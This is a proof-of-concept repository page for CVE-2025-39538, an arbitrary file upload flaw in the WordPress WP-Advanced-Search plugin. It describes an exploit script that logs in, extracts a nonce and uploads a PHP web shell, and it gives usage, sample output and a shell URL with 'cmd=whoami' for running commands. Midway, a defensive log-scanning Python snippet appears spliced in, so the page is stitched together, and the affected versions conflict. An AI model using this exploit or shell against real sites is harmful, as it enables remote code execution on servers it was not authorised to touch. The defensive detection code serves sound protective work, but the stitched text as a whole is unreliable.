
CVE-2025-39538 PoC — WordPress WP-Advanced-Search plugin <= 3.3.9.4 - Arbitrary File Upload Vulnerability

Associated Vulnerability
Title: WordPress WP-Advanced-Search plugin <= 3.3.9.4 - Arbitrary File Upload Vulnerability (CVE-2025-39538)
Description: Unrestricted Upload of File with Dangerous Type vulnerability in Mathieu Chartier WP-Advanced-Search wp-advanced-search allows Upload a Web Shell to a Web Server. This issue affects WP-Advanced-Search: from n/a through <= 3.3.9.4.

Description
WordPress WP-Advanced-Search <= 3.3.9.3 - Arbitrary File Upload Vulnerability

Readme

# 🛡️ CVE-2025-39538 - WordPress WP-Advanced-Search <= 3.3.9.3 Arbitrary File Upload

**CVE-2025-39538**  
**Published:** 2025-04-16  
**Vulnerability Type:** Arbitrary File Upload (Unrestricted Upload of File with Dangerous Type)  
**Affected Plugin:** WP-Advanced-Search by Mathieu Chartier  
**Affected Versions:** All versions up to and including 3.3.9.3

This vulnerability allows an authenticated attacker to upload a malicious PHP file (such as a web shell) to the server using the import functionality provided by the plugin. The uploaded file is placed under the WordPress uploads directory and could lead to remote code execution.

🧱 Upload path:
```
wp-content/uploads/2025/04/
```

---

## ⚙️ About the Exploit Script

This Python script performs the following actions:
1. Logs into the WordPress site using provided credentials.
2. Extracts the required `wp_advanced_search_up_nonce` from the import/export admin page.
3. Uploads a web shell (PHP file) via a crafted POST request.

---

## 🚀 Usage

```bash
usage: a.py [-h] -u URL -un USERNAME -p PASSWORD

CVE-2025-39538 - WP Advanced Search Arbitrary File Upload Exploit # By Nxploited (Khaled Alenazi)

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target WordPress URL (e.g., http://127.0.0.1/wordpress)
  -un, --username USERNAME
                        WordPress Username
  -p, --password PASSWORD
                        WordPress Password

```

### 🖥️ Example Output:
```
[*] Attempting login...
[+] Logged in successfully.
[*] Fetching nonce from import/export page...
[+] Nonce extracted: 2140855687
[*] Attempting to upload shell...
[+] File uploaded (check wp-content/uploads or temp directory).
```

---
## 🐚 Using the Uploaded Shell

After the upload, you can access your shell like this:

```
http://target.site/wp-content/uploads/2025/04/nxploit.php?cmd=whoami
```

Replace `whoami` with any Linux command you want to execute, for example:
- `id` — shows current user ID.
- `pwd` — shows current directory.
- `ls` — lists files.
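The two artefacts this README describes, a PHP file landing under `wp-content/uploads/` and requests to it carrying a `cmd` parameter, are exactly what a defender can hunt for. The following Python is an added example, not the PoC script or the plugin's code: the access-log lines are constructed, and the web-shell parameter names other than `cmd` are an assumption.

```python
import re
from pathlib import Path
from urllib.parse import urlsplit, parse_qs

# Apache/nginx combined log format (only the fields we need are captured).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+'
)
# Executable PHP extensions; WordPress should never serve these from uploads.
PHP_EXT = re.compile(r'\.ph(p\d?|tml|ar)$', re.I)
UPLOADS_PREFIX = "/wp-content/uploads/"
# "cmd" is the parameter named in the README; the others are an assumption.
CMD_PARAMS = {"cmd", "c", "exec", "command"}

# Constructed sample log: two shell requests, one normal image, one admin page.
SAMPLE_LOG = """\
203.0.113.5 - - [16/Apr/2025:10:01:02 +0000] "GET /wp-content/uploads/2025/04/nxploit.php?cmd=whoami HTTP/1.1" 200 24
203.0.113.5 - - [16/Apr/2025:10:01:07 +0000] "GET /wp-content/uploads/2025/04/nxploit.php?cmd=id HTTP/1.1" 200 61
198.51.100.9 - - [16/Apr/2025:10:02:00 +0000] "GET /wp-content/uploads/2025/04/photo.jpg HTTP/1.1" 200 81234
198.51.100.9 - - [16/Apr/2025:10:02:03 +0000] "GET /wp-admin/admin.php?page=wp-advanced-search HTTP/1.1" 200 5120
"""


def is_php_under_uploads(path):
    """True for any request path that would execute PHP from the uploads tree."""
    return path.startswith(UPLOADS_PREFIX) and bool(PHP_EXT.search(path))


def find_shell_hits(log_text):
    """Return (ip, path, has_cmd_param) for each PHP request under uploads."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line; skip rather than crash the sweep
        parts = urlsplit(m.group("target"))
        if not is_php_under_uploads(parts.path):
            continue
        params = set(parse_qs(parts.query).keys())
        hits.append((m.group("ip"), parts.path, bool(params & CMD_PARAMS)))
    return hits


def find_php_in_uploads(uploads_dir):
    """Filesystem sweep: relative paths of PHP files anywhere under uploads_dir."""
    root = Path(uploads_dir)
    return sorted(p.relative_to(root).as_posix()
                  for p in root.rglob("*") if p.is_file() and PHP_EXT.search(p.name))
```

Updating the plugin past the affected versions and denying PHP execution under the uploads directory at the web server closes the execution path even if a file still lands there.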

---

## ⚠️ Disclaimer

This tool is intended for **educational and authorized security testing** purposes only.  
The author is **not responsible** for any misuse or damage caused by this script.

---

_**By: Nxploited | Khaled Alenazi**_
File Snapshot

```
[4.0K] /data/pocs/5b7af00c26cd7c3b0a970e72dce34af48b81dea9
├── [3.0K] CVE-2025-39538.py
├── [1.1K] LICENSE
├── [2.3K] README.md
└── [  24] requirements.txt

0 directories, 4 files
```